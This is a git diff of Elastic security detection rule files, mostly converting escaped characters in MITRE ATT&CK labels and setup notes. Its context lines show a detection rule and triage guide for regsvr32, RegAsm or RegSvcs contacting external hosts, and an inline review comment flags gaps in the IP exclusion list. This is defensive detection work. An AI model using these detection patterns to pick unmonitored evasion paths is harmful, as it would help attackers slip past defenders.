service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json
index 27a3507de2e..861a5514f35 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
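Review bot: The IPv6 part of the `cidrmatch` exclusion list in the `query` context line (the list ending `"::1", "FE80::/10", "FF00::/8"`) has no entry for unique-local addresses, so regsvr32/RegAsm/RegSvcs connections to internal hosts on `fc00::/7` are classified as external and alert, while the equivalent IPv4 RFC 1918 ranges are excluded. If the intent is to mirror the IPv4 private-range exclusions, adding `"fc00::/7"` beside `"FE80::/10"` closes that gap; `0.0.0.0/8` is likewise absent although the referenced IANA special-purpose registry lists it. That query line is carried over unchanged from the previous rule version, so the gap predates this commit, and the preceding file section above this one shows the same query. The `sequence by process.entity_id` also has no `with maxspan` bound, which is worth confirming as intentional rather than an omission.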
diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json
index 378fb960f63..d3609509979 100644
--- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json
index 89489a83fa4..f96d62fc19d 100644
--- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json
index 5587e1f075d..5851aaf9843 100644
--- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json
index 1cf01e56d9d..3ddbb9a8a0c 100644
--- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json
index 642c7798393..963204a802d 100644
--- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json
index 124ff6068f3..5676ec24ca5 100644
--- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json
index 2afbcad5b97..14f3e982ba1 100644
--- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json index 4ed046f6a75..6bd5d3c4047 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json index c685abce863..596e6a8b3ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json index 9c9fe32b9be..89beebeaeb1 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json index 0bf77294cc8..3047a45c203 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json 
